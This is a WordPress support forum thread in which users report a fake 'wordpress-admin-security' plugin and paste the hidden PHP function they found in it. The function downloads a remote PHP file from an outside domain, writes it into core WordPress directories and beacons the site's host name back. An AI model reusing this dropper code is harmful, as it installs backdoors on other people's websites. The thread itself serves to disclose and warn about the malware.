I saw this created by a fake plugin wordpress-admin-security
Moderator
t-p
(@t-p)
Thanks @useshots. That was what was happening with me also. I saw the script was referencing a file hosted on some private school in Louisiana’s server. I emailed them to let them know.
This is the php:
function BNS_Add_Widget_Definition() {
if (!file_exists(ABSPATH.'wp-about-4.2.php')&&!file_exists(ABSPATH.'wp-content/wp-about-4.2.php')&&!file_exists(ABSPATH.'wp-includes/wp-about-4.2.php')){
$bns_conf=wp_remote_get('http://archbishopchapelle.org/wp-content/uploads/wpmp-previews/temp.php');
if (!file_put_contents(ABSPATH.'wp-about-4.2.php',$bns_conf["body"])){
if (!file_put_contents(ABSPATH.'wp-content/wp-about-4.2.php',$bns_conf["body"])){
file_put_contents(ABSPATH.'wp-includes/wp-about-4.2.php',$bns_conf["body"]);
$bns_conf=wp_remote_get('http://archbishopchapelle.org/wp-content/uploads/wpmp-previews/p.php?host='.urlencode($_SERVER['HTTP_HOST'].'-2'));
} else $bns_conf=wp_remote_get('http://archbishopchapelle.org/wp-content/uploads/wpmp-previews/p.php?host='.urlencode($_SERVER['HTTP_HOST'].'-1'));
}
}
}
Yeah. I found this suspicious function hidden in a wordpress-admin-security plugin as well. I suspect it was somehow side-injected through files on Godaddy’s hosting. I’ve run about 5+ wordpress sites for roughly 12 years and have never had so many security compromises on a wordpress site until I tried Godaddy’s hosting. But, maybe it was just this particular site. Anyway. +1 to blacklist “wordpress-admin-security”.
Moderator
t-p
(@t-p)
You may want to bring this to the attention of this plugin’s developers so they can take action as appropriate.
